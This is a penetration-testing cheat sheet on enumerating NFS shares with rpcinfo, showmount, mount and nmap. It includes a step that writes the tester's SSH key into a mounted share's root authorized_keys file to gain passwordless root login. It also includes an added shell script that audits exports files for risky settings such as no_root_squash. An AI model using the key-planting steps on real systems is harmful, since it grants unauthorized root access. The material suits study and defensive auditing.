NFS Enumeration (Port 111, 2049)

Quick Intro

  • Developed in 1984 by Sun Microsystems; similar to SMB in that it allows access to files over a network.

  • Common ports used by NFS are 111 and 2049 (TCP/UDP).

  • It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.

Identifying if NFS is in use

rpcinfo -p <ip>

# If 111 and 2049 are listed, shares are enabled and we can mount them

Show all mounts

  • If NFS is available, use showmount to view the available mount points

showmount -e $ip

Mount an NFS share

  • You can then mount the file system with the mount command and interact with the remote system

  • First create the directory for mounting:

    mkdir /mnt/nfs

mount -t nfs $ip:/share /mnt/nfs

Unmounting the shares

umount -f -l /mnt/nfs
# -f – Force unmount (in case of an unreachable NFS system). (Requires kernel 2.1.116 or later.)
# -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.)

Permission Denied ?

Further Exploitation

  • If you can write to the remote host, try to put an SSH key there so that we can get remote SSH access without a password:

ssh-keygen
# Generating ssh keys

cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys
# Putting it on the remote host

ssh root@$ip
# Now we can log in to the target without a password
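
Server-side check for the export settings that make the steps above possible (an added example, not part of the original notes): it flags exports that any host can mount, that any host can write to, or that set no_root_squash, which lets a client's root act as root on the share. It assumes one export per line with no backslash continuations; the sample paths and client addresses are constructed.

```shell
#!/bin/sh
# Added example: audit an exports(5) file for settings that expose a share.
# Assumes one export per line (no backslash continuations, no quoted paths).

# Constructed sample; paths and client addresses are made up for the demo.
sample_exports() {
cat <<'EOF'
# path        client(options)
/srv/public   *(ro)
/srv/backup   192.0.2.0/24(rw,no_root_squash)
/home         (rw,sync)
/data         192.0.2.5(rw,sync)
EOF
}

# Reads exports lines from the named file(s), or stdin, and prints
# "<path> <client> <FINDING>" for every risky client entry.
audit_exports() {
    awk '
    /^[ \t]*(#|$)/ { next }                  # skip comments and blank lines
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            spec = $i
            if (spec ~ /^#/) break           # trailing comment ends the entry
            host = spec; opts = ""
            p = index(spec, "(")
            if (p > 0) {
                host = substr(spec, 1, p - 1)
                opts = substr(spec, p + 1)
                sub(/\)$/, "", opts)
            }
            if (host == "") host = "*"       # "(rw)" with no client means any host
            o = "," opts ","
            if (host == "*") print path, host, "WORLD_MOUNTABLE"
            if (host == "*" && o ~ /,rw,/) print path, host, "WORLD_WRITABLE"
            # root_squash is the default; only an explicit opt-out is flagged
            if (o ~ /,no_root_squash,/) print path, host, "NO_ROOT_SQUASH"
        }
    }' "$@"
}

sample_exports | audit_exports
```

On an NFS server, run `audit_exports /etc/exports` and restrict each flagged entry to specific client hosts with root_squash left at its default.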

Nmap Scan on RPCbind and NFS

nmap -v -p 111 10.11.1.1-254

nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

nmap -p 111 --script "nfs*" 10.11.1.72
